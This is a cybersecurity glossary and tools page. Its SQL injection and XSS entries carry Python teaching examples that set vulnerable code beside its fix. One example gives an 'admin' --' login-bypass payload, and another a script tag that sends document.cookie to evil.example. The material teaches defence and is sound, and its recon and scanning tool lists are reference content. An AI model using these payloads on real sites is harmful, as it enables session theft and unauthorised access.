A security system that monitors and controls network traffic based on rules. Can be network-level (blocking traffic between networks) or host-level (on an individual machine). Not a silver bullet — most attacks enter via allowed traffic.
IDS / IPS — Intrusion Detection/Prevention System
IDS monitors network traffic for suspicious patterns and alerts. IPS goes further — it can automatically block detected threats. Often confused with firewalls; they serve different purposes.
IoC — Indicator of Compromise
Evidence that a system has been compromised — malicious IP addresses, file hashes, domain names, or registry keys associated with known malware. Used in threat intelligence to detect infections.
Malware
Malicious software — an umbrella term covering viruses, ransomware, trojans, spyware, adware, rootkits, and worms. Each has different infection vectors, persistence mechanisms, and objectives.
MITM — Man-in-the-Middle
Attack where the attacker intercepts communications between two parties. Both parties believe they're communicating directly with each other. HTTPS and certificate pinning mitigate this.
MFA / 2FA — Multi/Two-Factor Authentication
Requiring more than one proof of identity. Factors are something you know (password), something you have (phone), or something you are (biometric). Dramatically reduces account takeover risk.
OSINT — Open Source Intelligence
Intelligence gathered from publicly available sources without requiring privileged access. The foundation of reconnaissance in cybersecurity and the methodology behind ReconKit.
OSCP — Offensive Security Certified Professional
The most respected penetration testing certification. Features a 24-hour practical exam requiring candidates to compromise multiple machines in a controlled environment. No multiple choice — you either own the machines or you don't.
Penetration Testing
Authorised, simulated cyberattack against a system to find and report vulnerabilities before real attackers do. Distinguished from hacking by explicit written authorisation and defined scope.
Phishing
Social engineering attack using fraudulent communication (typically email) to steal credentials or deliver malware. Consistently one of the most common initial access vectors in corporate breaches.
Ransomware
Malware that encrypts victim data and demands payment for the decryption key. Has become a major criminal industry targeting hospitals, governments, and corporations. Offline or otherwise immutable backups, tested by actually restoring from them, are the primary defence against the encryption. Most crews now also steal data before encrypting it and threaten to leak it, which backups do nothing to address.
SIEM — Security Information and Event Management
Platform that aggregates and analyses log data from across an organisation's systems to detect threats. Splunk, Microsoft Sentinel, and IBM QRadar are leading products. Central tool in SOC operations.
SOC — Security Operations Centre
A team (and facility) dedicated to continuously monitoring and defending an organisation's systems. Entry-level SOC analyst is the most common first job in cybersecurity.
SQL Injection
Attack in which untrusted input is concatenated into a SQL query so that it changes the structure of the query instead of being treated as data. Can expose data, bypass authentication, or destroy records. Entirely preventable with parameterised queries (prepared statements), which send the query text and the values to the database separately.
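The vulnerable pattern next to the fix, as an added example that is not part of the original page: a login check built by string formatting, bypassed with a quote and a comment, and the same check as a parameterised query. The users table, credentials and payload are constructed for this example; it uses Python's built-in `sqlite3`, and stores plaintext passwords only to keep the demo short (a real system stores a salted hash, and the injection point is identical either way).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "Tr0ub4dor&3"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn, username: str, password: str):
    """VULNERABLE: user input is pasted into the SQL text, so a quote in the
    input ends the string literal and the rest becomes SQL."""
    query = (
        f"SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def safe_login(conn, username: str, password: str):
    """FIXED: parameterised query. The driver sends the SQL text and the values
    separately, so a quote in the input is just a character in a string."""
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def demo():
    conn = make_db()
    # Closing the quote and starting a SQL comment turns the WHERE clause into
    #   username = 'admin' --' AND password = 'wrong'
    # so the password comparison is commented out entirely.
    payload = "admin' --"
    bypassed = vulnerable_login(conn, payload, "wrong")
    blocked = safe_login(conn, payload, "wrong")
    legit = safe_login(conn, "alice", "hunter2")
    return bypassed, blocked, legit


if __name__ == "__main__":
    bypassed, blocked, legit = demo()
    print("string-built query:", bypassed)   # (1, 'admin'): logged in as admin
    print("parameterised query:", blocked)   # None: payload treated as a username
    print("real credentials:", legit)        # (2, 'alice')
```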
TLS/SSL
Protocols that encrypt and authenticate data in transit, most visibly between browser and server. TLS is the modern successor to SSL, which is deprecated and should be disabled. The "S" in HTTPS. Publicly trusted certificates are recorded in Certificate Transparency logs, so every certificate issued for a domain is searchable (for example via crt.sh), which helps defenders spot rogue issuance and helps attackers enumerate subdomains.
VPN — Virtual Private Network
Encrypts traffic and masks IP by routing through a server elsewhere. Shifts trust from ISP to VPN provider. Does not protect against fingerprinting, cookies, or account-based tracking.
XSS — Cross-Site Scripting
Injecting attacker-controlled JavaScript into a legitimate website so that it runs in victims' browsers with that site's privileges. Can steal session cookies, redirect users, or log keystrokes. Prevented primarily by context-aware output encoding of untrusted data; a Content Security Policy limits the damage when encoding is missed somewhere.
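Output encoding and CSP side by side, as an added example that is not part of the original page: a comment rendered straight into HTML versus the same comment HTML-encoded, plus the attribute context where a stray double quote is the escape, and the response header that stops inline scripts even when encoding is missed. The attacker comment and policy values are constructed for this example; it uses only the standard library `html` module.

```python
import html

# Constructed sample: a comment an attacker leaves on a forum page. If it runs,
# it sends every viewer's cookies to the attacker's server.
ATTACKER_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_unsafe(comment: str) -> str:
    """VULNERABLE: untrusted text dropped into the HTML body, so any tags in it
    become part of the page."""
    return f'<div class="comment">{comment}</div>'


def render_safe(comment: str) -> str:
    """FIXED (HTML body context): encode <, >, &, and quotes at output time.
    The browser shows the text of the payload instead of executing it."""
    return f'<div class="comment">{html.escape(comment)}</div>'


def render_attribute_safe(display_name: str) -> str:
    """Attribute context: here a double quote is what breaks out, e.g. the input
    '" onfocus="alert(1)'. html.escape(quote=True) turns it into &quot;."""
    return f'<input name="display" value="{html.escape(display_name, quote=True)}">'


def csp_header():
    """Defence in depth: allow scripts only from the site's own origin, so an
    inline <script> that slipped past encoding is refused by the browser."""
    return ("Content-Security-Policy",
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'")


def contains_live_script(markup: str) -> bool:
    """Crude demo check: does a real <script> tag survive in the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_unsafe(ATTACKER_COMMENT))   # script tag intact: XSS
    print(render_safe(ATTACKER_COMMENT))     # &lt;script&gt;...: harmless text
    print(render_attribute_safe('" onfocus="alert(1)'))
    print(": ".join(csp_header()))
```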
Zero-day
A software vulnerability unknown to the vendor, with no available patch. "Zero days" for defenders to prepare. Actively exploited zero-days are extremely valuable and traded on dark markets for significant sums.
// TOOLKIT
Recommended Tools
A curated list of tools used by professionals. Organised by purpose, with honest notes on when each one actually matters.
OSINT & Reconnaissance
| Tool | Type | Purpose |
|---|---|---|
| ReconKit | Web app | Browser-based OSINT toolkit — exposure, IP, domain, DNS, SSL, headers, breach |
| Shodan | Search engine | Find internet-connected devices, open ports, exposed services |
| Maltego | Desktop app | Visual link analysis and OSINT graph mapping |
| theHarvester | CLI | Email, subdomain, and employee enumeration from public sources |
| Sherlock | Python/CLI | Username search across 300+ social platforms |
| SpiderFoot | Web/CLI | Automated OSINT collection from 100+ sources |
| OSINT Framework | Reference | Directory of all public OSINT sources by data type |
Network & Infrastructure
| Tool | Purpose | Requires |
|---|---|---|
| Nmap | Port scanning and service detection | Authorisation |
| Wireshark | Packet capture and analysis | Your own network |
| Burp Suite | Web application testing proxy | Authorisation |
| Masscan | High-speed port scanner | Authorisation |
| dig / nslookup | DNS queries from command line | Freely usable |
| curl | HTTP requests and header inspection | Freely usable |
Learning Platforms
| Platform | Level | Cost | Best for |
|---|---|---|---|
| TryHackMe | Beginner–Intermediate | Free + £10/mo | Structured learning paths, browser-based labs |
| HackTheBox | Intermediate–Advanced | Free + €14/mo | Real-world machines, CTF competitions |
| PicoCTF | Beginner | Free | CTF competitions, university-grade challenges |
| PortSwigger Web Academy | All levels | Free | Web application security — best free resource available |
| SANS courses | Advanced | $5,000+ | Deep technical training with certs (GIAC) |
| Cybrary | All levels | Free + $69/mo | Video courses for most major certs |
Privacy Tools
| Tool | Purpose | Cost |
|---|---|---|
| uBlock Origin | Ad and tracker blocking — browser extension | Free |
| Bitwarden | Password manager — open source, cross-platform | Free |
| ProtonMail / Proton | Encrypted email and cloud storage | Free tier |
| Mullvad VPN | No-logs VPN, anonymous signup | €5/mo |
| Signal | End-to-end encrypted messaging | Free |
| Tor Browser | Anonymised browsing via onion routing | Free |
| ExifTool | Remove metadata (GPS, device info) from files | Free |